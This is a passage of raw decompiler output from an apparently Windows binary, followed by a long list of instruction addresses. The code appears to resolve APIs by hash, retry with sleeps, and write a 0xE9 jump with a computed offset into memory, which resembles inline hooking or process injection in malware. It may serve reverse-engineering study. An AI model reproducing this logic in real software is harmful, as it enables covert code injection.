							asm("movq [esp+0x68], xmm1");
							E00489670(_t1576 + 0x22c, E00489650(_t1576 + 0x228) + 0x10);
							E00489640(_t1576 + 0x22c, E00489650(_t1576 + 0x228) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							asm("pxor xmm1, xmm1");
							asm("movups [eax], xmm0");
							_v668 = 0x35b39b2b;
							asm("movq [esp+0x68], xmm1");
							E00489670(_t1576 + 0x22c, E00489650(_t1576 + 0x228) + 0x10);
							E00489640( &_v216, E00489650( &_v216) + 0xfffffff0);
							asm("movups xmm0, [esp+0x60]");
							_t1452 =  &_v220;
							asm("movups [eax], xmm0");
							E00491270(0x588ab3ea, _t1452);
							E00489640( &_v220, 0);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x70], xmm0");
							E00489640(_t1576 + 0x22c, 0x10);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x78], xmm0");
							E00489640(_t1576 + 0x22c, 0x20);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x80], xmm0");
							E00489640( &_v232, 0x30);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x88], xmm0");
							E00489640(_t1576 + 0x22c, 0x40);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x90], xmm0");
							E00489640(_t1576 + 0x22c, 0x50);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0x98], xmm0");
							E00489640(_t1576 + 0x22c, 0x60);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [esp+0xa0], xmm0");
							E00489640( &_v248, 0x70);
							asm("movq xmm0, [eax+0x8]");
							asm("movq [ecx-0x100], xmm0");
							_t747 = E0046D530( &_v380, _t1452);
							_v396 = _t747;
							_v400 = _t1452;
							_t1496 = _t1452 - 0xffffffff;
							__eflags = _t747 - 0xffffffff | _t1452 - 0xffffffff;
							if((_t747 - 0xffffffff | _t1452 - 0xffffffff) == 0) {
								E0046E230( &_v388);
								E00492530(_t1030,  &_v412, 0xffffffff, _t1496, _t1534);
								E00489510( &_v300);
								E00489510( &_v316);
								E00489510( &_v332);
								E00489510( &_v132);
								E0046E2F0(_t1030, _t1576 + 0x1bc, _t1569);
								E00489510( &_v256);
								__eflags = 0;
								return 0;
							} else {
								_t1455 = _v108 | _v104;
								__eflags = _t1455;
								if(_t1455 == 0) {
									_v604 = _t1030;
									_t1498 = 0;
									__eflags = 0;
									 *((intOrPtr*)(_t1576 + 0x54)) = _t1534;
									do {
										_push(0);
										E00489350( &_v428);
										E004716B0(_t1498, _t1534,  &_v376, 0x57325ee3);
										E0047FDB0( &_v384,  &_v376);
										_t1456 = 0x7fffffff;
										E00489710( &_v444, _v380, E00486040(_v380, 0x7fffffff));
										E00480B10( &_v388);
										E00478CA0( &_v396);
										_t1537 = _v168;
										_t1034 =  *((intOrPtr*)( &_v452 + 0x120));
										_t768 = E00489650( &_v452);
										__eflags = _t768;
										if(_t768 <= 0) {
											L25:
											asm("movq xmm0, [esp+0x200]");
											asm("movq [esp], xmm0");
											asm("pxor xmm2, xmm2");
											_v680 = 5;
											_v676 = _v280;
											asm("movq xmm1, [esp+0x210]");
											 *(_t1576 + 0x10) = _v284;
											asm("movq [esp+0x14], xmm1");
											_t1034 = _v148;
											_v660 = _v148;
											_t1534 = _v144;
											_v656 = _v144;
											asm("movq [esp+0x24], xmm2");
											asm("movq [esp+0x2c], xmm2");
											_t770 = E004904B0(_t1498, _v144);
											__eflags = _t770;
											if(_t770 == 0) {
												E004722A0(0x3e8, _t1456);
												E00489510( &_v432);
												_t1455 =  &_v120;
												E0046D570( &_v264, _t1455,  &_v112);
												__eflags = _v116 | _v112;
												if((_v116 | _v112) != 0) {
													_t1030 =  *((intOrPtr*)(_t1576 + 0x50));
													_t1534 = _v604;
													goto L9;
												} else {
													_t974 = E0046D530( &_v264, _t1455);
													_v280 = _t974;
													_v284 = _t1455;
													_t1479 = _t1455 - 0xffffffff;
													__eflags = _t974 - 0xffffffff | _t1455 - 0xffffffff;
													if((_t974 - 0xffffffff | _t1455 - 0xffffffff) == 0) {
														E0046E230( &_v392);
														E00492530(_t1034,  &_v416, _t1479, _t1498, _t1534);
														E00489510( &_v304);
														E00489510( &_v320);
														E00489510( &_v336);
														E00489510( &_v136);
														E0046E2F0(_t1034, _t1576 + 0x1bc, _t1569);
														E00489510( &_v260);
														__eflags = 0;
														return 0;
													} else {
														goto L29;
													}
												}
											} else {
												goto L26;
											}
										} else {
											__eflags = 0;
											_v624 = _t1498;
											_t1498 = _t1537;
											_t1534 = 0;
											while(1) {
												_t1005 = E00489640( &_v432, _t1534);
												asm("movq xmm0, [esp+0x200]");
												asm("movq [esp], xmm0");
												 *((intOrPtr*)(_t1576 + 8)) = 5;
												_v680 = _v284;
												asm("movq xmm1, [esp+0x1f8]");
												_v676 = _v288;
												_t1456 =  *_t1005 & 0x000000ff;
												asm("movq [esp+0x14], xmm1");
												asm("movq xmm2, [0x499d40]");
												 *((intOrPtr*)(_t1576 + 0x1c)) = _t1498;
												_v660 = _t1034;
												_v656 =  *_t1005 & 0x000000ff;
												 *((intOrPtr*)(_t1576 + 0x28)) = 0;
												asm("movq [esp+0x2c], xmm2");
												_t1006 = E004904B0(_t1498, _t1534);
												__eflags = _t1006;
												if(_t1006 != 0) {
													break;
												}
												E004722A0(0x64, _t1456);
												_t1498 = _t1498 + 1;
												asm("adc ebx, 0x0");
												_t1534 = _t1534 + 1;
												_t1008 = E00489650( &_v432);
												__eflags = _t1534 - _t1008;
												if(_t1534 < _t1008) {
													continue;
												} else {
													_t1498 = _v624;
													goto L25;
												}
												goto L95;
											}
											L26:
											E00489510( &_v432);
											E0046E230( &_v392);
											E00492530(_t1034,  &_v416, _t1456, _t1498, _t1534);
											E00489510( &_v304);
											E00489510( &_v320);
											E00489510( &_v336);
											E00489510( &_v136);
											E0046E2F0(_t1034, _t1576 + 0x1bc, _t1569);
											E00489510( &_v260);
											__eflags = 0;
											return 0;
										}
										goto L95;
										L29:
										_t1498 = _t1498 + 1;
										__eflags = _t1498 - 0xa;
									} while (_t1498 != 0xa);
									E0046E230( &_v392);
									E00492530(_t1034,  &_v416, _t1479, _t1498, _t1534);
									E00489510( &_v304);
									E00489510( &_v320);
									E00489510( &_v336);
									E00489510( &_v136);
									E0046E2F0(_t1034, _t1576 + 0x1bc, _t1569);
									E00489510( &_v260);
									__eflags = 0;
									return 0;
								} else {
									L9:
									 *((intOrPtr*)(_t1576 + 0x50)) = _t1030;
									_t1499 = 0;
									__eflags = 0;
									_v604 = _t1534;
									_t1538 = _v284;
									_t1035 = _v280;
									while(1) {
										asm("movq xmm0, [esp+0x200]");
										asm("movq xmm1, [esp+0x1f8]");
										asm("pxor xmm2, xmm2");
										asm("movq [esp], xmm0");
										_v680 = 5;
										_v676 = _t1035;
										 *(_t1576 + 0x10) = _t1538;
										asm("movq [esp+0x14], xmm1");
										_v660 = _v148;
										asm("movq xmm3, [0x499d48]");
										_v656 = _v144;
										asm("movq [esp+0x24], xmm2");
										asm("movq [esp+0x2c], xmm3");
										_t778 = E004904B0(_t1499, _t1538);
										__eflags = _t778;
										if(_t778 == 0) {
											break;
										}
										_t1035 = E0046D530( &_v264, _t1455);
										_t1538 = _t1455;
										_t1455 = _t1538 - 0xffffffff;
										__eflags = _t1035 - 0xffffffff | _t1455;
										if((_t1035 - 0xffffffff | _t1455) == 0) {
											E0046E230( &_v392);
											E00492530(_t1035,  &_v416, _t1455, _t1499, _t1538);
											E00489510( &_v304);
											E00489510( &_v320);
											E00489510( &_v336);
											E00489510( &_v136);
											E0046E2F0(_t1035, _t1576 + 0x1bc, _t1569);
											E00489510( &_v260);
											__eflags = 0;
											return 0;
										} else {
											_t1499 = _t1499 + 1;
											__eflags = _t1499 - 0xa;
											if(_t1499 != 0xa) {
												continue;
											} else {
												E0046E230( &_v392);
												E00492530(_t1035,  &_v416, _t1455, _t1499, _t1538);
												E00489510( &_v304);
												E00489510( &_v320);
												E00489510( &_v336);
												E00489510( &_v136);
												E0046E2F0(_t1035, _t1576 + 0x1bc, _t1569);
												E00489510( &_v260);
												__eflags = 0;
												return 0;
											}
										}
										goto L95;
									}
									_v284 = _t1538;
									_t1500 = 0;
									__eflags = 0;
									_v280 = _t1035;
									_t1539 = _v284;
									_t1036 = _v280;
									while(1) {
										_push(0x80);
										_push(_v144);
										_push(_v148);
										_push(_t1539);
										_push(_t1036);
										_t1457 =  &_v576;
										__eflags = E0046D170( &_v264, _t1457);
										if(__eflags != 0) {
											break;
										}
										_t1036 = E0046D530( &_v284, _t1457);
										_t1539 = _t1457;
										_t1477 = _t1539 - 0xffffffff;
										__eflags = _t1036 - 0xffffffff | _t1539 - 0xffffffff;
										if((_t1036 - 0xffffffff | _t1539 - 0xffffffff) == 0) {
											E0046E230( &_v412);
											E00492530(_t1036,  &_v436, _t1477, _t1500, _t1539);
											E00489510( &_v324);
											E00489510( &_v340);
											E00489510( &_v356);
											E00489510( &_v156);
											E0046E2F0(_t1036,  &_v264, _t1569);
											E00489510( &_v280);
											__eflags = 0;
											return 0;
										} else {
											_t1500 = _t1500 + 1;
											__eflags = _t1500 - 0xa;
											if(_t1500 != 0xa) {
												continue;
											} else {
												E0046E230( &_v412);
												E00492530(_t1036,  &_v436, _t1477, _t1500, _t1539);
												E00489510( &_v324);
												E00489510( &_v340);
												E00489510( &_v356);
												E00489510( &_v156);
												E0046E2F0(_t1036,  &_v264, _t1569);
												E00489510( &_v280);
												__eflags = 0;
												return 0;
											}
										}
										goto L95;
									}
									_v300 = _t1036;
									 *((intOrPtr*)(_t1576 + 0x64)) = _v620;
									asm("cdq");
									asm("movd xmm1, ebx");
									_t1038 =  &_v616;
									_t1501 =  *((intOrPtr*)(_t1038 + 0x1c8));
									_t781 =  &_v604;
									 *(_t781 + 0x12c) = _t1539;
									asm("movd xmm0, edx");
									asm("punpckldq xmm1, xmm0");
									_t1540 =  *((intOrPtr*)(_t781 - 0x14));
									 *((intOrPtr*)(_t781 - 0xc)) = 0;
									 *((intOrPtr*)(_t781 - 8)) =  *((intOrPtr*)(_t1038 + 0x1c8));
									asm("movdqu [eax-0x28], xmm1");
									asm("movq [eax], xmm1");
									_t1459 =  &_v612;
									_t782 = E00490C90(_t1540, _t1459, __eflags, _t781, 0x40, _t1038);
									__eflags = _t782;
									if(_t782 != 0) {
										E0046E230( &_v412);
										E00492530(_t1038,  &_v436, _t1459, _t1501, _t1540);
										E00489510( &_v324);
										E00489510( &_v340);
										E00489510( &_v356);
										E00489510( &_v156);
										E0046E2F0(_t1038,  &_v264, _t1569);
										E00489510( &_v280);
										__eflags = 0;
										return 0;
									} else {
										__eflags = 0;
										_v624 = _t1540;
										_v628 = 0;
										_t1040 = _v300;
										_t1503 = _v620;
										_t1542 = _v160;
										while(1) {
											L35:
											asm("movq xmm0, [esp+0x200]");
											asm("movq [esp], xmm0");
											asm("pxor xmm2, xmm2");
											_v700 = 5;
											 *(_t1576 + 0xc) = _t1040;
											asm("movq xmm1, [esp+0x1f8]");
											 *(_t1576 + 0x10) = _v304;
											asm("movq [esp+0x14], xmm1");
											_v680 = _t1542;
											_v676 = _t1503;
											asm("movq [esp+0x24], xmm2");
											asm("movdqu xmm3, [esp+0x40]");
											asm("movq [esp+0x2c], xmm3");
											_t793 = E004904B0(_t1503, _t1542);
											__eflags = _t793;
											if(_t793 == 0) {
												break;
											}
											_t1055 = 0;
											__eflags = 0;
											while(1) {
												_t911 = E0046CA10( &_v284, __eflags);
												_t1326 = _t1459;
												_t1459 = _t911 | _t1326;
												__eflags = _t1459;
												if(_t1459 != 0) {
													break;
												}
												__eflags = _t1055 - 0x20;
												if(_t1055 == 0x20) {
													_t1040 = 0xffffffff;
													_v304 = 0xffffffff;
												} else {
													E004722A0(0x5dc, _t1459);
													_t1055 = _t1055 + 1;
													continue;
												}
												L47:
												__eflags = _t1040 - 0xffffffff | _v304 - 0xffffffff;
												if((_t1040 - 0xffffffff | _v304 - 0xffffffff) == 0) {
													E0046E230( &_v412);
													E00492530(_t1040,  &_v436, 0xffffffff, _t1503, _t1542);
													E00489510( &_v324);
													E00489510( &_v340);
													E00489510( &_v356);
													E00489510( &_v156);
													E0046E2F0(_t1040,  &_v264, _t1569);
													E00489510( &_v280);
													__eflags = 0;
													return 0;
												} else {
													_t1459 = _v628 + 1;
													_v628 = _t1459;
													__eflags = _t1459 - 0xa;
													if(_t1459 != 0xa) {
														goto L35;
													} else {
														E0046E230( &_v412);
														E00492530(_t1040,  &_v436, _t1459, _t1503, _t1542);
														E00489510( &_v324);
														E00489510( &_v340);
														E00489510( &_v356);
														E00489510( &_v156);
														E0046E2F0(_t1040,  &_v264, _t1569);
														E00489510( &_v280);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_v304 = _t1326;
											_t1040 = _t911;
											goto L47;
										}
										_v300 = _t1040;
										__eflags = 0;
										_t1041 = _v304;
										_t1543 = _v300;
										_v644 = 0;
										while(1) {
											_t795 = E00489640( &_v324, 0);
											_t1504 = _t795;
											_push(E00489650( &_v328));
											_push(_v624);
											_push(_v164);
											_push(_t1041);
											_push(_t1543);
											_t1460 = _t795;
											__eflags = E0046D170( &_v288, _t1460);
											if(__eflags != 0) {
												break;
											}
											_t1518 = 0;
											__eflags = 0;
											while(1) {
												_t1543 = E0046CA10( &_v304, __eflags);
												_t1041 = _t1460;
												__eflags = _t1543 | _t1041;
												if((_t1543 | _t1041) != 0) {
													break;
												}
												__eflags = _t1518 - 0x20;
												if(_t1518 == 0x20) {
													_t1543 = 0xffffffff;
													_t1041 = 0xffffffff;
												} else {
													E004722A0(0x5dc, _t1460);
													_t1518 = _t1518 + 1;
													continue;
												}
												break;
											}
											_t1472 = _t1041 - 0xffffffff;
											__eflags = _t1543 - 0xffffffff | _t1041 - 0xffffffff;
											if((_t1543 - 0xffffffff | _t1041 - 0xffffffff) == 0) {
												E0046E230( &_v432);
												E00492530(_t1041, _t1576 + 0x110, _t1472, _t1518, _t1543);
												E00489510( &_v344);
												E00489510(_t1576 + 0x170);
												E00489510( &_v376);
												E00489510( &_v176);
												E0046E2F0(_t1041,  &_v284, _t1569);
												E00489510( &_v300);
												__eflags = 0;
												return 0;
											} else {
												_t900 =  *((intOrPtr*)(_t1576 + 0x40)) + 1;
												 *((intOrPtr*)(_t1576 + 0x40)) = _t900;
												__eflags = _t900 - 0xa;
												if(_t900 != 0xa) {
													continue;
												} else {
													E0046E230( &_v432);
													E00492530(_t1041, _t1576 + 0x110, _t1472, _t1518, _t1543);
													E00489510( &_v344);
													E00489510(_t1576 + 0x170);
													E00489510( &_v376);
													E00489510( &_v176);
													E0046E2F0(_t1041,  &_v284, _t1569);
													E00489510( &_v300);
													__eflags = 0;
													return 0;
												}
											}
											goto L95;
										}
										_v320 = _t1543;
										_t798 =  &_v636;
										 *(_t798 + 0x138) = _t1041;
										_t1544 =  *((intOrPtr*)(_t798 - 8));
										_t1461 = _t1576 + 0x6c;
										_t799 = E00490C90( *((intOrPtr*)(_t798 - 8)), _t1576 + 0x6c, __eflags,  &_v624, _v636, _t798);
										__eflags = _t799;
										if(_t799 == 0) {
											_push(0);
											E00489350(_t1576 + 0x44);
											_v644 = 0xe9;
											E00489710( &_v668,  &_v644, 1);
											_v660 = _v192 -  *((intOrPtr*)( &_v660 + 0x154)) + 0xfffffffb;
											E00489710( &_v676,  &_v660, 4);
											_t1043 =  &_v656;
											asm("movq xmm0, [0x499d50]");
											 *((intOrPtr*)(_t1043 + 4)) = _v328;
											 *((intOrPtr*)(_t1043 + 8)) =  *((intOrPtr*)(_t1043 + 0x1bc));
											asm("movq [ebx+0xc], xmm0");
											E00490C90(_t1544, _t1576 + 0x6c, __eflags,  &_v644, 0x40, _t1043);
											__eflags = 0;
											_v676 = 0;
											_t1044 = _v356;
											_t1545 = _v352;
											while(1) {
												_t810 = E00489640( &_v668, 0);
												_push(E00489650(_t1576 + 0x40));
												_push(_v200);
												_push(_v316);
												_push(_t1044);
												_push(_t1545);
												_t1465 = _t810;
												_t812 = E0046D170( &_v312, _t1465);
												__eflags = _t812;
												if(_t812 != 0) {
													break;
												}
												_t1514 = 0;
												__eflags = 0;
												while(1) {
													_t1545 = E0046CA10( &_v328, __eflags);
													_t1044 = _t1465;
													__eflags = _t1545 | _t1044;
													if((_t1545 | _t1044) != 0) {
														break;
													}
													__eflags = _t1514 - 0x20;
													if(_t1514 == 0x20) {
														_t1545 = 0xffffffff;
														_t1044 = 0xffffffff;
													} else {
														E004722A0(0x5dc, _t1465);
														_t1514 = _t1514 + 1;
														continue;
													}
													break;
												}
												_t1470 = _t1044 - 0xffffffff;
												__eflags = _t1545 - 0xffffffff | _t1044 - 0xffffffff;
												if((_t1545 - 0xffffffff | _t1044 - 0xffffffff) == 0) {
													E00489510(_t1576 + 0x40);
													E0046E230(_t1576 + 0x128);
													E00492530(_t1044,  &_v480, _t1470, _t1514, _t1545);
													E00489510( &_v368);
													E00489510( &_v384);
													E00489510( &_v400);
													E00489510( &_v200);
													E0046E2F0(_t1044,  &_v308, _t1569);
													E00489510( &_v324);
													__eflags = 0;
													return 0;
												} else {
													_t865 = _v668 + 1;
													_v668 = _t865;
													__eflags = _t865 - 0xa;
													if(_t865 != 0xa) {
														continue;
													} else {
														E00489510(_t1576 + 0x40);
														E0046E230(_t1576 + 0x128);
														E00492530(_t1044,  &_v480, _t1470, _t1514, _t1545);
														E00489510( &_v368);
														E00489510( &_v384);
														E00489510( &_v400);
														E00489510( &_v200);
														E0046E2F0(_t1044,  &_v308, _t1569);
														E00489510( &_v324);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_v348 = _t1044;
											_t1045 = 0;
											__eflags = 0;
											_v344 = _t1545;
											_t1466 = _v348;
											_t813 = _t1545;
											while(1) {
												asm("movq xmm0, [esp+0x200]");
												asm("movq [esp], xmm0");
												asm("pxor xmm1, xmm1");
												_v744 = 5;
												_v740 = _t813;
												_v736 = _t1466;
												_v732 = _v332;
												 *((intOrPtr*)(_t1576 + 0x18)) = _v216;
												_t1546 =  *((intOrPtr*)(_t1576 + 0x21c));
												_v724 =  *((intOrPtr*)(_t1576 + 0x21c));
												_t1507 =  *((intOrPtr*)(_t1576 + 0x220));
												 *((intOrPtr*)(_t1576 + 0x20)) =  *((intOrPtr*)(_t1576 + 0x220));
												asm("movq [esp+0x24], xmm1");
												asm("movq [esp+0x2c], xmm1");
												_t815 = E004904B0( *((intOrPtr*)(_t1576 + 0x220)),  *((intOrPtr*)(_t1576 + 0x21c)));
												__eflags = _t815;
												if(_t815 == 0) {
													break;
												}
												_t1547 = 0;
												__eflags = 0;
												while(1) {
													_t813 = E0046CA10( &_v328, __eflags);
													__eflags = _t813 | _t1466;
													if((_t813 | _t1466) != 0) {
														break;
													}
													__eflags = _t1547 - 0x20;
													if(_t1547 == 0x20) {
														_t813 = 0xffffffff;
														_t1466 = 0xffffffff;
													} else {
														E004722A0(0x5dc, _t1466);
														_t1547 = _t1547 + 1;
														continue;
													}
													break;
												}
												_t1549 = _t1466 - 0xffffffff;
												_t1510 = _t813 - 0xffffffff | _t1466 - 0xffffffff;
												__eflags = _t813 - 0xffffffff | _t1466 - 0xffffffff;
												if((_t813 - 0xffffffff | _t1466 - 0xffffffff) == 0) {
													E00489510(_t1576 + 0x40);
													E0046E230(_t1576 + 0x128);
													E00492530(_t1045,  &_v480, _t1466, _t1510, _t1549);
													E00489510( &_v368);
													E00489510( &_v384);
													E00489510( &_v400);
													E00489510( &_v200);
													E0046E2F0(_t1045,  &_v308, _t1569);
													E00489510( &_v324);
													__eflags = 0;
													return 0;
												} else {
													_t1045 = _t1045 + 1;
													__eflags = _t1045 - 0xa;
													if(_t1045 != 0xa) {
														continue;
													} else {
														E00489510(_t1576 + 0x40);
														E0046E230(_t1576 + 0x128);
														E00492530(_t1045,  &_v480, _t1466, _t1510, _t1549);
														E00489510( &_v368);
														E00489510( &_v384);
														E00489510( &_v400);
														E00489510( &_v200);
														E0046E2F0(_t1045,  &_v308, _t1569);
														E00489510( &_v324);
														__eflags = 0;
														return 0;
													}
												}
												goto L95;
											}
											_push(0);
											_t1467 = _v168;
											__eflags = _t1467;
											_t1468 =  !=  ? _t1467 + 0xc : _t1467;
											_push( !=  ? _t1467 + 0xc : _t1467);
											_t1047 = E00491A80( !=  ? _t1467 + 0xc : _t1467, _t1467,  &_v480, 0x2710);
											E00489510(_t1576 + 0x50);
											E0046E230(_t1576 + 0x138);
											E00492530(_t1047,  &_v480,  !=  ? _t1467 + 0xc : _t1467, _t1507, _t1546);
											E00489510( &_v368);
											E00489510( &_v384);
											E00489510( &_v400);
											E00489510( &_v200);
											E0046E2F0(_t1047,  &_v308, _t1569);
											E00489510( &_v324);
											__eflags = _t1047 - 1;
											_t465 = _t1047 - 1 > 0;
											__eflags = _t465;
											return 0 | _t465;
										} else {
											E0046E230( &_v432);
											E00492530( &_v624, _t1576 + 0x110, _t1461, _t1504, _t1544);
											E00489510( &_v344);
											E00489510(_t1576 + 0x170);
											E00489510( &_v376);
											E00489510( &_v176);
											E0046E2F0( &_v624,  &_v284, _t1569);
											E00489510( &_v300);
											__eflags = 0;
											return 0;
										}
									}
								}
							}
						} else {
							goto L6;
						}
					}
				} else {
					E00489510(_t1572 + 0x228);
					E0046E2F0(_t1027,  &_v180, _t1569);
					E00489510( &_v196);
					return 0;
				}
				L95:
			}

0x0046acd9
0x0046acdf
0x0046ace3
0x0046acf4
0x0046acf7
0x0046acfc
0x0046ad05
0x0046ad0c
0x0046ad13
0x0046ad1b
0x0046ad20
0x0046ad29
0x0046ad2e
0x0046ad3d
0x0046ad41
0x0046ad57
0x0046ad73
0x0046ad78
0x0046ad84
0x0046ad88
0x0046ad8b
0x0046ad93
0x0046ada9
0x0046adc5
0x0046adca
0x0046add6
0x0046adda
0x0046addd
0x0046ade5
0x0046adfb
0x0046ae17
0x0046ae1c
0x0046ae28
0x0046ae2c
0x0046ae2f
0x0046ae37
0x0046ae4d
0x0046ae69
0x0046ae6e
0x0046ae7a
0x0046ae7e
0x0046ae81
0x0046ae89
0x0046ae9f
0x0046aebb
0x0046aec0
0x0046aecc
0x0046aed0
0x0046aed3
0x0046aedb
0x0046aef1
0x0046af0d
0x0046af12
0x0046af23
0x0046af26
0x0046af34
0x0046af39
0x0046af3e
0x0046af50
0x0046af55
0x0046af5a
0x0046af6c
0x0046af71
0x0046af76
0x0046af88
0x0046af8d
0x0046af92
0x0046afa4
0x0046afa9
0x0046afae
0x0046afc0
0x0046afc5
0x0046afd1
0x0046afd6
0x0046afeb
0x0046aff0
0x0046aff9
0x0046b002
0x0046b039
0x0046b042
0x0046b05f
0x0046b072
0x0046b077
0x0046b07c
0x0046c89d
0x0046c8a0
0x0046c8a4
0x0046c8a6
0x0046c8aa
0x0046c8af
0x0046c8d5
0x0046c8e1
0x0046c8e9
0x0046c8f5
0x0046c903
0x0046c908
0x0046c90e
0x00000000
0x0046c914
0x0046c914
0x0046c920
0x0046c924
0x0046c928
0x0046c92a
0x00000000
0x0046c930
0x0046c930
0x0046c935
0x00000000
0x0046c93b
0x0046c93b
0x0046c946
0x0046c954
0x0046c967
0x0046c96c
0x0046c978
0x0046c980
0x0046c98c
0x0046c99f
0x0046c9a1
0x0046c9ab
0x0046c9b5
0x0046c9b8
0x0046c9c0
0x0046c9c2
0x0046c9c6
0x0046c9c8
0x0046c9cc
0x0046c9cc
0x0046c9ce
0x0046c9d2
0x0046c9d2
0x0046c9d3
0x0046c9d7
0x0046c9db
0x0046c9de
0x0046c9e1
0x00000000
0x00000000
0x0046c9e3
0x0046c9e7
0x0046c9ea
0x00000000
0x00000000
0x00000000
0x0046c9ea
0x0046c9ec
0x0046c9ec
0x0046c9f7
0x0046c9ff
0x0046c9ff
0x0046c935
0x0046c92a
0x0046b082
0x0046b082
0x0046b082
0x0046b08b
0x0046b08b
0x0046b097
0x0046b0a3
0x0046b0a8
0x0046b0b7
0x0046b0bb
0x0046b0d1
0x0046b0ed
0x0046b0f2
0x0046b0fe
0x0046b102
0x0046b105
0x0046b10d
0x0046b123
0x0046b13f
0x0046b144
0x0046b150
0x0046b154
0x0046b157
0x0046b15f
0x0046b175
0x0046b191
0x0046b196
0x0046b19b
0x0046b19e
0x0046b1aa
0x0046b1b9
0x0046b1be
0x0046b1c2
0x0046b1d0
0x0046b1d5
0x0046b1da
0x0046b1ec
0x0046b1f1
0x0046b1f6
0x0046b20d
0x0046b215
0x0046b21c
0x0046b223
0x0046b22c
0x0046b231
0x0046b23a
0x0046b246
0x0046b248
0x0046b24f
0x0046b262
0x0046b269
0x0046b282
0x0046b290
0x0046b2a7
0x0046b2ac
0x0046b2bb
0x0046b2c2
0x0046b2d2
0x0046b2d9
0x0046b2ee
0x0046b2f3
0x0046b2fa
0x0046b303
0x0046b30a
0x0046b319
0x0046b320
0x0046b32c
0x0046b338
0x0046b344
0x0046b350
0x0046b35c
0x0046b361
0x0046b36f
0x0046b30c
0x0046b313
0x0046b317
0x0046b37e
0x0046b383
0x0046b38b
0x0046b399
0x0046b39a
0x0046b39b
0x0046b3a4
0x0046b3ab
0x0046b3b5
0x0046b3bf
0x0046b3c9
0x0046b3d5
0x0046b3d6
0x0046b3dd
0x0046b3e1
0x0046b3e5
0x0046b3f3
0x0046b401
0x0046b402
0x0046b40a
0x0046b40e
0x0046b412
0x0046b420
0x0046b433
0x0046b434
0x0046b438
0x0046b43c
0x0046b440
0x0046b460
0x0046b46c
0x0046b476
0x0046b47c
0x0046b482
0x0046b487
0x0046b496
0x0046b49a
0x0046b4b0
0x0046b4cc
0x0046b4d1
0x0046b4dd
0x0046b4e1
0x0046b4e4
0x0046b4ec
0x0046b502
0x0046b51e
0x0046b523
0x0046b52f
0x0046b533
0x0046b536
0x0046b53e
0x0046b554
0x0046b570
0x0046b575
0x0046b581
0x0046b585
0x0046b588
0x0046b590
0x0046b5a6
0x0046b5c2
0x0046b5c7
0x0046b5d3
0x0046b5d7
0x0046b5da
0x0046b5e2
0x0046b5f8
0x0046b614
0x0046b619
0x0046b625
0x0046b629
0x0046b62c
0x0046b634
0x0046b64a
0x0046b666
0x0046b66b
0x0046b677
0x0046b67b
0x0046b67e
0x0046b686
0x0046b69c
0x0046b6b8
0x0046b6bd
0x0046b6c9
0x0046b6cd
0x0046b6d0
0x0046b6d8
0x0046b6ee
0x0046b70a
0x0046b70f
0x0046b714
0x0046b720
0x0046b723
0x0046b731
0x0046b736
0x0046b73b
0x0046b74a
0x0046b74f
0x0046b754
0x0046b763
0x0046b768
0x0046b76d
0x0046b77f
0x0046b784
0x0046b789
0x0046b79b
0x0046b7a0
0x0046b7a5
0x0046b7b7
0x0046b7bc
0x0046b7c1
0x0046b7d3
0x0046b7d8
0x0046b7dd
0x0046b7ef
0x0046b7f4
0x0046b800
0x0046b808
0x0046b80d
0x0046b814
0x0046b824
0x0046b826
0x0046b828
0x0046c829
0x0046c835
0x0046c841
0x0046c84d
0x0046c859
0x0046c865
0x0046c871
0x0046c87d
0x0046c882
0x0046c890
0x0046b82e
0x0046b835
0x0046b835
0x0046b83c
0x0046ba4c
0x0046ba50
0x0046ba50
0x0046ba52
0x0046ba56
0x0046ba56
0x0046ba5f
0x0046ba71
0x0046ba85
0x0046ba93
0x0046baa6
0x0046bab2
0x0046babe
0x0046bac3
0x0046bad1
0x0046bad7
0x0046badc
0x0046bade
0x0046bb91
0x0046bb91
0x0046bb9a
0x0046bb9f
0x0046bba3
0x0046bbb2
0x0046bbbd
0x0046bbc6
0x0046bbca
0x0046bbd0
0x0046bbd7
0x0046bbdb
0x0046bbe2
0x0046bbe6
0x0046bbec
0x0046bbf2
0x0046bbf7
0x0046bbf9
0x0046bc7d
0x0046bc89
0x0046bc9d
0x0046bca4
0x0046bcb0
0x0046bcb7
0x0046c815
0x0046c819
0x00000000
0x0046bcbd
0x0046bcc4
0x0046bcc9
0x0046bcd0
0x0046bce0
0x0046bce2
0x0046bce4
0x0046c7ab
0x0046c7b7
0x0046c7c3
0x0046c7cf
0x0046c7db
0x0046c7e7
0x0046c7f3
0x0046c7ff
0x0046c804
0x0046c812
0x00000000
0x00000000
0x00000000
0x0046bce4
0x00000000
0x00000000
0x00000000
0x0046bae4
0x0046bae4
0x0046bae6
0x0046baea
0x0046baec
0x0046baee
0x0046baf6
0x0046bafb
0x0046bb04
0x0046bb09
0x0046bb18
0x0046bb23
0x0046bb2c
0x0046bb30
0x0046bb33
0x0046bb39
0x0046bb41
0x0046bb45
0x0046bb49
0x0046bb4d
0x0046bb55
0x0046bb5b
0x0046bb60
0x0046bb62
0x00000000
0x00000000
0x0046bb6d
0x0046bb72
0x0046bb7c
0x0046bb7f
0x0046bb80
0x0046bb85
0x0046bb87
0x00000000
0x0046bb8d
0x0046bb8d
0x00000000
0x0046bb8d
0x00000000
0x0046bb87
0x0046bbfb
0x0046bc02
0x0046bc0e
0x0046bc1a
0x0046bc26
0x0046bc32
0x0046bc3e
0x0046bc4a
0x0046bc56
0x0046bc62
0x0046bc67
0x0046bc75
0x0046bc75
0x00000000
0x0046bcea
0x0046bcea
0x0046bceb
0x0046bceb
0x0046bcfb
0x0046bd07
0x0046bd13
0x0046bd1f
0x0046bd2b
0x0046bd37
0x0046bd43
0x0046bd4f
0x0046bd54
0x0046bd62
0x0046b842
0x0046b842
0x0046b842
0x0046b846
0x0046b846
0x0046b848
0x0046b84c
0x0046b853
0x0046b85a
0x0046b85a
0x0046b863
0x0046b86c
0x0046b870
0x0046b875
0x0046b87d
0x0046b881
0x0046b885
0x0046b892
0x0046b89d
0x0046b8a5
0x0046b8a9
0x0046b8af
0x0046b8b5
0x0046b8ba
0x0046b8bc
0x00000000
0x00000000
